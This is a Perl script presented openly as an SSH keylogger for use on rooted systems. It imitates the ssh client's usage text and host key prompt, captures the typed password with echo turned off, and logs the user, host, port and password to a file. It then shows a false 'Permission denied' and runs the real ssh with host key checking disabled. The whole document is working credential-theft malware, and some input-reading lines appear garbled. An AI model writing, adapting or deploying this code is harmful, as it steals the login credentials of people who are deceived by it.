#!/usr/bin/perl ##############################################################. # (UNSECURE)SH Logg3r # # # # An SSH Seamless Keylogger # # Use with a bogus acct and "alias" # # or on a rooted system, will generate a "Login Incorrect" # # making the user think he/she misstyped their passwd. # # # # Try to keep without too many deps/perl modules - so far # # just IO::Socket::INET ---> # # If you root a Debian box do: # # apt-get install libio-socket-ssl-perl # # Or simply use CPAN if you think you have enough time: # # cpan install IO::Socket::INET # # # # # # # # Coded by Trevelyn - Douglas at WeakNetLabs dot com # # 2009 WeakNet Labs # # # ##############################################################' use IO::Socket::INET; # Arguments: @ARGV; # If no arguments: if (@ARGV[0] eq '') {&error;} sub error { print "usage: ssh [-1246AaCfgKkMNnqsTtVvXxY] [-b bind_address] [-c cipher_spec]\n" ," [-D [bind_address:]port] [-e escape_char] [-F configfile]\n" ," [-i identity_file] [-L [bind_address:]port:host:hostport]\n" ," [-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port]\n" ," [-R [bind_address:]port:host:hostport] [-S ctl_path]\n" ," [-w local_tun[:remote_tun]] [user@]hostname [command]\n"; exit; } # Open up logger file: open (LOG, ">>/hacktools/keyloggers/ssh_mitm/payload-ssh.txt"); print LOG "\n.=####################################=.\n"; # Search agruments for a user name if specified with "-l" $u = 0; ++$u until $ARGV[$u] =~ /-l/ || $u > $#ARGV; $user = ($u + 1); # Log the User: (First See if a Username was specified): if (@ARGV[$user] eq "") { $userf = getlogin(); } else { $userf = @ARGV[$user]; } print LOG "User: $userf\n"; # Get the HOSTNAME for the SSH Server: @host = grep(/\./, @ARGV); # Log the IP/HOSTNAME: print LOG "Host: @host\n"; # If no host: if (@host[0] eq "") { &error; } # Get a port number if specified: $v = 0; ++$v until $ARGV[$v] =~ /-p/ || $v > $#ARGV; if ($ARGV[$v] =~ /-p/) { $pnum = ($v + 1); $port = @ARGV[$pnum];} # Or it's just port 22: else { $port = 22; } # Log port number: print LOG "Port: $port\n"; # See if you have connected before: open (RSAF, '/home/assistant/.ssh/known_hosts'); $check0 = @host[0]; $check0 =~ s/\./\\./g; while () { $lines = $_; chomp $lines; close ($RSAF); if ($lines =~ m/$check0/) { &checkport; }} # Issue false RSA warning: print "The authenticity of host \'[@host[0]]:@ARGV[$port] ([@host[0]]:@ARGV[$port])\' can\'t be established." ,"\nRSA key fingerprint is c7:32:94:4e:3a:1d:b0:73:98:d7:46:f3:27:f4:d8:7e." ,"\nAre you sure you want to continue connecting (yes/no)? "; $ans = ;&checkport; # See if you are trying the right port :P sub checkport { $hostf = @host[0]; $sock = IO::Socket::INET->new(PeerAddr => $hostf, PeerPort => $port, Proto => 'tcp') || &portdown; &continue0; } sub portdown { $host = @host[0]; print "ssh: connect to host $host port $port: Connection refused\n"; exit; } sub continue0 { # Ask for password like SSH does: print "$userf\@@host\'s password: "; system("stty -echo"); $passwd = ; chomp $passwd; system("stty echo"); # Log passwd: print LOG "Password: $passwd\n"; # Save File: close ($LOG); &finished; } sub finished { print "\nPermission denied, please try again.\n"; # Now really use SSH, and ignore the Key Error: system "ssh -o 'StrictHostKeyChecking=no' @host[0] -p $port -l $userf"; exit; }